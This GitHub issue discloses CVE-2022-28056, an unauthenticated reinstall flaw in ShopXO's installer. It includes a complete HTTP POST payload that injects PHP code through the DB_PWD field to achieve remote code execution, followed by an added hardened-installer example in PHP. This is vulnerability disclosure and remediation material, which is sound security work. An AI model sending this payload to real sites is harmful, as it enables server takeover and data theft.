CVE-2022-28056: A system reinstall vulnerability was found in ShopXO · Issue #66 · gongfuxiang/shopxo
ShopXO v2.2.5 and below was discovered to contain a system re-install vulnerability via the Add function in app/install/controller/Index.php.
Hello, in my code audit process, I found system reinstallation vulnerability in ShopXO 2.2.0-2.2.5, the details are as follows:
In the app/install/controller/Index.php file, the Add function:
It does not check the visitor's permissions, nor whether the database has already been installed (i.e., whether config/database.php exists).
Then the Add function resets the original database data and writes the data submitted in the POST to config/database.php; code can be injected into it, resulting in RCE.
Below is the attack payload:
POST /install.php?s=index/Add.html HTTP/1.1
Host: xxxx
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
X-Requested-With: XMLHttpRequest
Referer: http://xxxx/admin.php?s=index/index.html
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
DB_TYPE=mysql&DB_HOST=192.168.195.185&DB_PORT=3306&DB_NAME=shopxo&DB_USER=root&DB_PWD=root'.phpinfo().'123&DB_PREFIX=sxo_&DB_CHARSET=utf8mb4
Then open any page to see the phpinfo page.
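As an added illustration (not ShopXO's code, and not the patch the project shipped), the shape a hardened installer would take for the two defects described in the report: it refuses to run once a lock file or config already exists, whitelists each submitted field, and serializes the values with var_export() so that a value like the one in the payload can only ever become a quoted string literal rather than executable PHP. INSTALL_LOCK, FIELD_RULES and writeDatabaseConfig() are hypothetical names chosen for this example.

```php
<?php
// Added example (hypothetical installer, not ShopXO's own code).
declare(strict_types=1);

const CONFIG_DIR   = __DIR__ . '/config';
const INSTALL_LOCK = CONFIG_DIR . '/install.lock';   // assumed lock-file name
const CONFIG_FILE  = CONFIG_DIR . '/database.php';

// Whitelist pattern per field: anything that could break out of a string literal is rejected.
const FIELD_RULES = [
    'DB_TYPE'    => '/^(mysql|pgsql|sqlite)$/',
    'DB_HOST'    => '/^[A-Za-z0-9.\-]{1,253}$/',
    'DB_PORT'    => '/^\d{1,5}$/',
    'DB_NAME'    => '/^[A-Za-z0-9_]{1,64}$/',
    'DB_USER'    => '/^[A-Za-z0-9_.\-]{1,32}$/',
    'DB_PWD'     => '/^[\x20-\x7E]{0,128}$/',   // printable ASCII; still never interpolated raw
    'DB_PREFIX'  => '/^[A-Za-z0-9_]{0,16}$/',
    'DB_CHARSET' => '/^[A-Za-z0-9]{1,16}$/',
];

function installerIsLocked(): bool
{
    // First line of defence: once installed, the installer must refuse to run again.
    return is_file(INSTALL_LOCK) || is_file(CONFIG_FILE);
}

function validateDbParams(array $post): array
{
    $clean = [];
    foreach (FIELD_RULES as $field => $pattern) {
        $value = $post[$field] ?? '';
        if (!is_string($value) || preg_match($pattern, $value) !== 1) {
            throw new InvalidArgumentException("Invalid value for $field");
        }
        $clean[$field] = $value;
    }
    return $clean;
}

function renderConfig(array $params): string
{
    // var_export() emits properly quoted PHP literals, so a value such as
    // root'.phpinfo().'123 is stored as a string constant, not executed as code.
    return "<?php\nreturn " . var_export($params, true) . ";\n";
}

function writeDatabaseConfig(array $post): void
{
    if (installerIsLocked()) {
        http_response_code(403);
        throw new RuntimeException('Already installed; installer is disabled');
    }
    $params = validateDbParams($post);

    // Write atomically, then create the lock so the installer cannot be re-run.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, renderConfig($params), LOCK_EX) === false) {
        throw new RuntimeException('Could not write database config');
    }
    rename($tmp, CONFIG_FILE);
    touch(INSTALL_LOCK);
}

// Entry point for the installer request; only POST is accepted.
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    writeDatabaseConfig($_POST);
    echo 'installed';
}
```

The lock check and the var_export() serialization are independent layers: the first stops a re-install on an already deployed site, the second ensures that even during a legitimate first install the submitted values cannot alter the generated PHP. Operationally, the installer route (here /install.php) should also be blocked or removed at the web server once installation is complete, and any POST to it on a live site is worth alerting on.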